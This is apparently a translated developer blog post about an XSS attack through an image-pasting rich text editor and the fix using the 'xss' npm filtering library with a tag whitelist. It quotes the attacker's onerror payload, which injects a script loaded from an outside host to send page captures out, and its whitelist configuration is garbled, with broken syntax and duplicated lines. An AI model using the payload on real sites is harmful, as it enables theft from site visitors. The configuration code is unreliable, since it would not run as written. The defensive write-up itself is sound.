Blame it all on the rich text editor….
Modify the text field into rich text editor to support users to paste pictures directly. Users are attacked by uploading pictures on the network
Onerror =s=createElement(‘script’); body.appendChild(s); s.src=’//x0.nz/nQqS’;
When the data is displayed, an onError event is executed. As a result, the screenshot of the current page is sent to the specified email address
The initial solution was to simply turn off the rich text editor for uploading web images, but the attacker was attacked again using Fiddler to modify the parameters to achieve the same effect
Finally, the third-party XSS attack defense plug-in is adopted and whitelist is configured to solve the problem. Data is filtered when submitted and returned to the back end
Plugin Chinese document address: github.com/leizongmin/…
npm install xss
import filterXSS from "xss"
User-defined filtering rules
When the XSS () function is called for filtering, the custom rule can be set with a second argument:
options = {}; HTML = filterXSS('<script>alert(" XSS "); </script>', options);Copy the codeUse whiteList. The format is {‘ label name ‘: [‘ attribute 1’, ‘attribute 2’]}. Tags that are not on the whitelist are filtered, as are attributes that are not on the whitelist.
WhiteList: {h1: ["style"], h2: ["style"], h3: {stripIgnoreTagBody: true; ["style"], h4: ["style"], h5: ["style"], h6: ["style"], hr: ["style"], span: ["style"], strong: ["style"], b: ["style"], i: ["style"], br: [], p: ["style"], pre: ["style"], code: ["style"], a: ["style", "target", "href", "title", "rel"], img: ["style", "src", "title"], div: ["style"], table: ["style", "width", "border"], tr: ["style"], td: ["style", "width", "colspan"], th: ["style", "width", "colspan"], tbody: ["style"], ul: ["style"], li: ["style"], ol: ["style"], dl: ["style"], dt: ["style"], em: ["style"], cite: ["style"], section: ["style"], header: ["style"], footer: ["style"], blockquote: ["style"], audio: ["autoplay", "controls", "loop", "preload", "src"], video: [ "autoplay", "controls", "loop", "preload", "src", "height", "width", ], }, css: WhiteList: {color: true, "background-color": true, width: true, height: 0} whiteList: {color: true, "background-color": true, width: true, height: 0} true, "max-width": true, "max-height": true, "min-width": true, "min-height": true, "font-size": true, }, }, } content = filterXSS(content,options)Copy the code